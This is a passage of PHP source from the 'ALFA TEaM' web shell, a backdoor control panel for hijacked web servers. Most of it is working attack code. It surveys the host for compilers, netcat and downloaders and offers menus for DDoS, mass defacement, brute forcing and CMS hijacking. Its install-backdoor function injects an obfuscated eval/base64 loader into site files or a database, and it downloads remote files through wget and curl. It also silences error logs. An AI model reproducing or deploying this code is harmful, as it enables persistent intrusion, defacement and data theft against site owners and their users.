<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>' . date('Y-m-d H:i:s') . '</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
        if ($GLOBALS['sys'] == 'unix') {
            $d0mains = _alfa_file("/etc/named.conf", false);
            if (!$d0mains) {
                echo "Cant Read [ /etc/named.conf ]";
                $GLOBALS["need_to_update_header"] = "true";
            } else {
                $count = 0;
                foreach ($d0mains as $d0main) {
                    if (@strstr($d0main, "zone")) {
                        preg_match_all('#zone "(.*)"#', $d0main, $domains);
                        flush();
                        if (strlen(trim($domains[1][0])) > 2) {
                            flush();
                            $count++;
                        }
                    }
                }
                echo "{$count} Domains";
            }
        } else {
            echo "Cant Read [ /etc/named.conf ]";
        }
        echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>' . alfaSize($totalSpace) . ' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</b></td>
</tr>';
        if ($GLOBALS['sys'] == 'unix') {
            $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
            if (!@ini_get('safe_mode')) {
                if (strlen(alfaEx("id", false, false)) > 0) {
                    echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Useful : </span>";
                    $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl');
                    $x = 0;
                    foreach ($userful as $item) {
                        if (alfaWhich($item)) {
                            $x++;
                            echo '<span class="header_values" style="margin-left: 4px;">' . $item . '</span>';
                        }
                    }
                    if ($x == 0) {
                        echo "<span class='header_values' id='header_useful'>--------------</span>";
                        $GLOBALS["need_to_update_header"] = "true";
                    }
                    echo "</td>\n</tr>\n<tr>\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span>";
                    $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
                    $x = 0;
                    foreach ($downloaders as $item2) {
                        if (alfaWhich($item2)) {
                            $x++;
                            echo '<span class="header_values" style="margin-left: 4px;">' . $item2 . '</span>';
                        }
                    }
                    if ($x == 0) {
                        echo "<span class='header_values' id='header_downloader'>--------------</span>";
                        $GLOBALS["need_to_update_header"] = "true";
                    }
                    echo "</td>\n</tr>";
                } else {
                    echo $useful_downloader;
                    $GLOBALS["need_to_update_header"] = "true";
                }
            } else {
                echo $useful_downloader;
                $GLOBALS["need_to_update_header"] = "true";
            }
        } else {
            echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Windows:</span><b>";
            echo alfaEx('ver', false, false);
            echo "</td>\n</tr> <tr>\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span><b>-------------</b></td>\n</tr></b>";
        }
        $quotes = function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0';
        if ($quotes == "1" or $quotes == "on") {
            $magic = '<b><span class="header_on">ON</span>';
        } else {
            $magic = '<span class="header_off">OFF</span>';
        }
        echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>' . Alfa_GetDisable_Function() . '</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>' . $curl . ' | <span class="header_vars">SSH2 : </span>' . $ssh2 . ' | <span class="header_vars">Magic Quotes : </span>' . $magic . ' | <span class="header_vars"> MySQL :</span>' . $mysql . ' | <span class="header_vars">MSSQL :</span>' . $mssql . ' | <span class="header_vars"> PostgreSQL :</span>' . $pg . ' | <span class="header_vars"> Oracle :</span>' . $or . ' ' . ($GLOBALS['sys'] == "unix" ? '| <span class="header_vars"> CGI :</span> ' . $cgi_shell : "") . '</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>' . $open_b . '</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>' . $safe_exe . '</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>' . $safe_include . '</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>' . @getenv('SERVER_SOFTWARE') . '</b></td>
</tr>';
        if ($GLOBALS['sys'] == "win") {
            echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>' . $drives . '</b></td>
</tr>';
        }
        echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">' . $cwd_links . ' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
        $li = array('FilesMan' => 'Home', 'proc' => 'Process', 'phpeval' => 'Eval', 'sql' => 'SQL Manager', 'dumper' => 'Mysql Dumper', 'hash' => 'En-Decoder', 'connect' => 'BC', 'ssh2' => 'SSH2', 'zoneh' => 'ZONE-H', 'dos' => 'DDOS', 'safe' => 'ByPasser', 'cgishell' => 'Cgi Shell', 'ssiShell' => 'SSI SHELL', 'cpcrack' => 'Hash Tools', 'portscanner' => 'Port Scaner', 'basedir' => 'Open BaseDir', 'mail' => 'Fake Mail', 'ziper' => 'Compressor', 'IndexChanger' => 'Index Changer', 'pwchanger' => 'Add New Admin', 'ShellInjectors' => 'Shell Injectors', 'php2xml' => 'PHP2XML', 'cloudflare' => 'CloudFlare', 'Whmcs' => 'Whmcs DeCoder', 'symlink' => 'Symlink', 'MassDefacer' => 'Mass Defacer', 'Crackers' => 'BruteForcer', 'searcher' => 'Searcher', 'cmshijacker' => 'CMS Hijacker', 'remotedl' => 'Remote Upload', 'inbackdoor' => 'Install BackDoor', 'whois' => 'Whois', 'settings' => 'Alfa Settings', 'plus' => '<span class="alfa_plus">Alfa +</font>', 'selfrm' => 'Remove Shell');
        foreach ($li as $key => $value) {
            echo '<li><a href="javascript:void(0);" class="menu_options" onclick="g(\'' . $key . '\',null,\'\',\'\',\'\');">' . $value . '</a></li>' . "\n";
        }
        if (!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) {
            echo "<li><a href=\"javascript:void(0);\" onclick=\"g('logout',null,'','','');setTimeout(function(){location.reload();},2000);\"><font color=\"red\">LogOut</font></a></li></ul></div>";
        } else {
            echo "</ul></div>";
        }
    } else {
        @error_reporting("\0\0\17\3\30");
        @ini_set('error_log', NULL);
        @ini_set('log_errors', 0);
        @ini_set('max_execution_time', 0);
        @ini_set('magic_quotes_runtime', 0);
        @set_time_limit(0);
    }
}
function alfalogout()
{
    unset($_SESSION['AlfaUser'], $_SESSION['AlfaPass']);
    echo "<center><font color='red'>Logout...</font></center>";
}
function showAnimation($name)
{
    return '-webkit-animation: ' . $name . ' 800ms ease-in-out forwards;-moz-animation: ' . $name . ' 800ms ease-in-out forwards;-ms-animation: ' . $name . ' 800ms ease-in-out forwards;animation: ' . $name . ' 800ms ease-in-out forwards;';
}
function __showicon($r)
{
    $s['btn'] = 'http://solevisible.com/images/btn.png';
    $s['alfamini'] = 'http://solevisible.com/images/alfamini.png';
    $s['loader'] = 'http://solevisible.com/images/loader.png';
    //return 'data:image/png;base64,'.__get_resource($s[$r]);
    return $s[$r];
}
function alfainbackdoor()
{
    alfahead();
    echo "<div class=header><center><p><div class=\"txtfont_header\">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'file')\">| In File | </a><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'db')\">| In DataBase | </a></h3></center>";
    $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
    $success = '<font color="green">Success...!';
    $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
    $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
    $cwd = 'Example: /home/alfa/public_html/index.php';
    if ($_POST['alfa1'] == 'file') {
        echo "<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\"><div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select> <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='Example: /home/alfa/public_html/index.php'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '><div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div></form></p></center>";
        if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa4'] != '') {
            $method = $_POST['alfa2'];
            $file = $_POST['alfa3'];
            $shell = $_POST['alfa4'];
            $key = str_replace(array('"', '\''), '', trim($_POST['alfa5']));
            if ($key == '') {
                $key = 'alfa';
            }
            if ($method == 'my') {
                $shell = __ZW5jb2Rlcg($shell);
            } else {
                $shell = $GLOBALS['__ALFA_SHELL_CODE'];
            }
            $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x("' . $shell . '");exit;}?>';
            if (@is_file($file) && @is_writable($file)) {
                @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
            } else {
                __alert($error);
            }
        }
    }
    if ($_POST['alfa1'] == 'db') {
        echo "<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml('all') . "<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50'));
        create_table($table);
        echo "<p>{$select}</p>";
        echo $textarea;
        echo "<p><input type='submit' value=' '></p></form></p></center>";
        if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa5'] != '' && $_POST['alfa6'] != '') {
            $dbhost = $_POST['alfa2'];
            $dbuser = $_POST['alfa3'];
            $dbpw = $_POST['alfa4'];
            $dbname = $_POST['alfa5'];
            $file = $_POST['alfa6'];
            $method = $_POST['alfa7'];
            $shell = $_POST['alfa8'];
            $key = str_replace(array('"', '\''), '', trim($_POST['alfa9']));
            if ($key == '') {
                $key = 'alfa';
            }
            if ($method == 'my') {
                $shell = __ZW5jb2Rlcg($shell);
            } else {
                $shell = $GLOBALS['__ALFA_SHELL_CODE'];
            }
            if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) {
                $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$conn=mysqli_connect("' . str_replace('"', '\\"', $dbhost) . '","' . str_replace('"', '\\"', $dbuser) . '","' . str_replace('"', '\\"', $dbpw) . '","' . str_replace('"', '\\"', $dbname) . '");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x($r["code"]);exit;}?>';
                if (@is_file($file) && @is_writable($file)) {
                    @mysqli_query($conn, 'DROP TABLE `alfa_bc`');
                    @mysqli_query($conn, 'CREATE TABLE `alfa_bc` (code LONGTEXT)');
                    @mysqli_query($conn, 'INSERT INTO `alfa_bc` VALUES("' . $shell . '")');
                    @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                    __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
                } else {
                    __alert($error);
                }
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfawhois()
{
    echo "<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>";
    if ($_POST['alfa2'] == '>>' && !empty($_POST['alfa1'])) {
        $site = str_replace(array('http://', 'https://', 'www.', 'ftp://'), '', $_POST['alfa1']);
        $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=' . $site;
        $data = @file_get_contents($target);
        if ($data == '') {
            $get = new AlfaCURL();
            $get->ssl = true;
            $data = $get->Send($target);
        }
        $target = @json_decode($data, true);
        echo __pre();
        if (is_array($target)) {
            echo $target["whois_raw"];
        } else {
            echo alfaEx("whois " . $site);
        }
    }
    echo "</div>";
}
function alfaremotedl()
{
    alfahead();
    echo "<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>\n<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">\n<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>\n<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='" . $GLOBALS['cwd'] . "'><p><input type='submit' value=' '></p>\n</form></p></center>";
    if (isset($_POST['alfa1'], $_POST['alfa2'], $_POST['alfa3']) && !empty($_POST['alfa1']) && $_POST['alfa3'] == '>>') {
        echo __pre();
        $url = $_POST['alfa1'];
        $path = $_POST['alfa2'];
        echo "<center>";
        if (__download($url, $path)) {
            echo "<font color=\"green\">Success...!</font>";
        } else {
            echo "<font color=\"red\">Error...!</font>";
        }
        echo "</center>";
    }
    echo "</div>";
    alfafooter();
}
function __download($url, $path = false)
{
    if (!preg_match("/[a-z]+:\\/\\/.+/", $url)) {
        return false;
    }
    $saveas = basename(rawurldecode($url));
    if ($path) {
        $saveas = $path . $saveas;
    }
    if ($content = __read_file($url)) {
        if (@is_file($saveas)) {
            @unlink($saveas);
        }
        if (__write_file($saveas, $content)) {
            return true;
        }
    }
    $buff = alfaEx("wget " . $url . " -O " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("curl " . $url . " -o " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("lwp-download " . $url . " " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("lynx -source " . $url . " > " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("GET " . $url . " > " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("links -source " . $url . " > " . $saveas);
    if (@is_file($saveas)) {
        return true;
    }
    $buff = alfaEx("fetch -o " . $saveas . " -p " . $url);
    if (@is_file($saveas)) {
        return true;
    }
    return false;
}
function clean_string($string)
{
    if (function_exists("iconv")) {
        $s = trim($string);
        $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
    }
    return $s;
}
function __read_file($file, $boom = true)
{
    $content = false;
    if ($fh = @fopen($file, "rb")) {
        $content = "";
        while (!feof($fh)) {
            $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
        }
    }
    if (empty($content) || !$content) {
        $content = alfaEx("cat '" . addslashes($file) . "'");
    }
    return $content;
}
function alfaSettings()
{
    alfahead();
    AlfaNum(6, 7, 8, 9, 10);
    echo "<div class=header><center><p><div class=\"txtfont_header\">| Settings |</div></p><h3><a href=javascript:void(0) onclick=\"g('settings',null,null,null,null,null,null,null,null,'main')\">| Generall Setting | </a><a href=javascript:void(0) onclick=\"g('settings',null,null,null,null,null,null,null,null,'color')\">| Change Color | </a></h3></center>";
    if ($_POST["alfa8"] == "main") {
        echo "<p><center><div class=\"txtfont_header\">| Settings |</div></p><form onSubmit=\"reloadSetting(this);return false;\" method='post'>";
        $lg_array = array('0' => 'No', '1' => 'Yes');
        $penc_array = array('false' => 'No', 'true' => 'Yes');
        $protect_html = "";
        $icon_html = "";
        $postEnc_html = "";
        $login_html = "";
        foreach ($lg_array as $key => $val) {
            $protect_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['safemode'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
        }
        foreach ($lg_array as $key => $val) {
            $icon_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
        }
        foreach ($penc_array as $key => $val) {
            $postEnc_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa7']) && $_POST['alfa7'] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST['alfa7']) ? 'selected' : '')) . '>' . $val . '</option>';
        }
        $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound");
        foreach ($lg_array as $key => $val) {
            $login_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['login_page'] == $key ? 'selected' : '') . '>' . $val . '</option>';
        }
        echo "";
        echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">' . $protect_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">' . $postEnc_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">' . $icon_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">' . $login_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="' . (empty($_POST['alfa3']) ? $GLOBALS['DB_NAME']['user'] : $_POST['alfa3']) . '" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="' . $GLOBALS['DB_NAME']['safemode'] . '"><input type="hidden" name="s" value="' . $GLOBALS['DB_NAME']['show_icons'] . '"><p><input type="submit" name="btn" value=" "></p></form></center>';
        if ($_POST['alfa5'] == '>>') {
            echo __pre();
            if (!empty($_POST['alfa3'])) {
                $protect = $_POST['alfa1'];
                $lgpage = $_POST['alfa2'];
                $username = $_POST['alfa3'];
                $password = md5($_POST['alfa4']);
                $icon = $_POST['alfa6'];
                $post_encrypt = $_POST['alfa7'];
                @chdir($GLOBALS['home_cwd']);
                $basename = @basename($_SERVER['PHP_SELF']);
                $data = @file_get_contents($basename);
                $find_user = '/\'user\'(.*?),/i';
                $find_pw = '/\'pass\'(.*?),/i';
                $find_lg = '/\'login_page\'(.*?),/i';
                $find_p = '/\'safemode\'(.*?),/i';
                $icons = '/\'show_icons\'(.*?),/i';
                $postEnc = '/\'post_encryption\'(.*?),/i';
                if (!empty($username) && preg_match($find_user, $data, $e)) {
                    $new = '\'user\' => \'' . $username . '\',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (!empty($_POST['alfa4']) && preg_match($find_pw, $data, $e)) {
                    $new = '\'pass\' => \'' . $password . '\',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (!empty($lgpage) && preg_match($find_lg, $data, $e)) {
                    $new = '\'login_page\' => \'' . $lgpage . '\',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (!empty($find_p) && preg_match($find_p, $data, $e)) {
                    $new = '\'safemode\' => \'' . $protect . '\',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (preg_match($icons, $data, $e)) {
                    $new = '\'show_icons\' => \'' . $icon . '\',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (preg_match($postEnc, $data, $e)) {
                    $new = '\'post_encryption\' => ' . $post_encrypt . ',';
                    $data = str_replace($e[0], $new, $data);
                }
                if (@file_put_contents($basename, $data)) {
                    echo '<b>UserName: </b><font color="green"><b>' . $username . '</b></font><br /><b>Password: </b><font color="green"><b>' . $_POST['alfa4'] . '</b></font><script>post_encryption_mode = ' . $post_encrypt . ';</script>';
                } else {
                    __alert("<span style='color:red;'>File has no edit access...!</span>");
                }
            } else {
                __alert("<span style='color:red;'>UserName is Empty !</span>");
            }
        }
    } elseif ($_POST["alfa8"] == "color") {
        echo "<center><p><div class=\"txtfont_header\">| Custom Color |</div></p><form onSubmit=\"reloadColors();return false;\" method='post'>";
        echo "<table border=\"1\"><tbody>";
        $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
        $x = 1;
        foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
            $multi = "";
            if (is_array($value)) {
                if (isset($value["multi_selector"])) {
                    $multi = __ZW5jb2Rlcg(json_encode($value));
                }
            }
            $value = alfa_getColor($key);
            $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
            echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
        }
        echo "<tr><td style=\"text-align:center;\">-</td><td style=\"text-align:center;\"><div class=\"tbltxt\">*</div></td><td><div style=\"margin-left:5px;\" class=\"tbltxt\">Use Default Color:</div></td><td></td><td><center><input type=\"checkbox\" id=\"use_default_color\" value=\"1\"></center></td></tr>";
        echo "</tbody></table><p><input type=\"submit\" name=\"btn\" value=\" \"></p></form><p><button style=\"padding:4px;;margin-right:20px;\" onclick=\"\$('importFileBtn').click();\" class=\"button\"> Import </button> <button style=\"padding:4px;margin-left:20px;\" onclick=\"g('settings',null,null,null,null,null,null,null,'export','color')\" class=\"button\"> Export </button></center></p>";
        if ($_POST['alfa7'] == 'export') {
            echo __pre();
            $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array();
            $glob_colors = $GLOBALS["__ALFA_COLOR__"];
            $array = array();
            foreach ($glob_colors as $k => $v) {
                if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                    $v = trim($colors[$k]);
                } else {
                    $v = trim(is_array($v) ? $v["key_color"] : $v);
                }
                $array[$k] = $v;
            }
            $file = "alfa_color_config_" . date('Y-m-d-h_i_s') . ".conf";
            $config = json_encode($array, JSON_PRETTY_PRINT);
            if (!@file_put_contents($file, $config)) {
                echo '<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">' . $config . '</textarea></center></p>';
            } else {
                echo '<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $file . '\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>';
            }
        }
        if ($_POST['alfa2'] == '>>') {
            echo __pre();
            $colors = json_decode($_POST["alfa1"], true);
            $array = "";
            $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false;
            $glob_colors = $GLOBALS["__ALFA_COLOR__"];
            foreach ($glob_colors as $k => $v) {
                if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                    $v = trim($colors[$k]);
                } else {
                    $v = trim(is_array($v) ? $v["key_color"] : $v);
                }
                $array .= '"' . trim($k) . '" => "' . $v . '",';
            }
            @chdir($GLOBALS['home_cwd']);
            $basename = @basename($_SERVER['PHP_SELF']);
            $data = @file_get_contents($basename);
            $color = '/\'color\'(.*?)\\),/s';
            if (preg_match($color, $data, $e)) {
                $new = "'color' => array(" . $array . "),";
                $data = str_replace($e[0], $new, $data);
                if (@file_put_contents($basename, $data)) {
                    echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>";
                } else {
                    echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>";
                }
            } else {
                echo "<center><p><h3>[-] Error...!</h3></p></center>";
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaplus()
{
    alfahead();
    echo "<div class=\"header\"><center><p><div class=\"txtfont_header\">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick=\"g('plus',null,'news');\">| News | </a><a href=javascript:void(0) onclick=\"g('plus',null,'tools')\">| Tools | </a><a href=javascript:void(0) onclick=\"g('plus',null,'about')\">| About Us | </a></h3></center>";
    if ($_POST['alfa1'] == 'news' || $_POST['alfa1'] == 'tools') {
        try {
            $s1 = 'http://solevisible.com/' . ($_POST['alfa1'] == 'news' ? 'news.php' : 'tools.php');
            $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
            $news = new AlfaCURL();
            if ($news->Send($s1)) {
                $xml = $news->Send($s1);
            } else {
                $xml = false;
            }
            if ($xml) {
                if (@simplexml_load_string($xml)) {
                    $doc = new DOMDocument();
                    $doc->loadXML($xml);
                    $data = $doc->getElementsByTagName('data')->item(0);
                    $items = $data->getElementsByTagName('item');
                    foreach ($items as $item) {
                        $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
                        $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
                        $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
                        $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
                        echo __pre() . "<center><a href='{$link}' target='_blank'>{$title}</a><br>{$description}<br><small><font  color='#FFFFFF'><b>Date: {$pubDate}</b></font></small></center></pre>";
                    }
                } else {
                    echo $msg;
                }
            } else {
                echo $msg;
            }
        } catch (Exception $e) {
            echo $e->getMessage();
        }
    } elseif ($_POST['alfa1'] == 'about') {
        echo __pre() . "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>\n<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>\n<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\n<font color='#00A220'>Contact : solevisible@gmail.com</font><br>\n<font color='#00A220'>Telegram Channel: @solevisible</font><br>\n<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>\n<font color='#FFFFFF'>Skype : sole.sad</font><br>\n<font color='#FF0000'>Persian Gulf For Ever</font><br>\n<font color='#FF0000'>Iranian Hackers :)</font><br>\n<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>\n</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
    }
    echo "</div>";
    alfafooter();
}
function alfaDumper()
{
    alfahead();
    echo "<div class=\"header\">";
    AlfaNum(8, 9, 10);
    echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
    $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']) . 'alfa.sql', 'inputSize' => '50'));
    create_table($table);
    echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
    $username = $_POST['alfa3'];
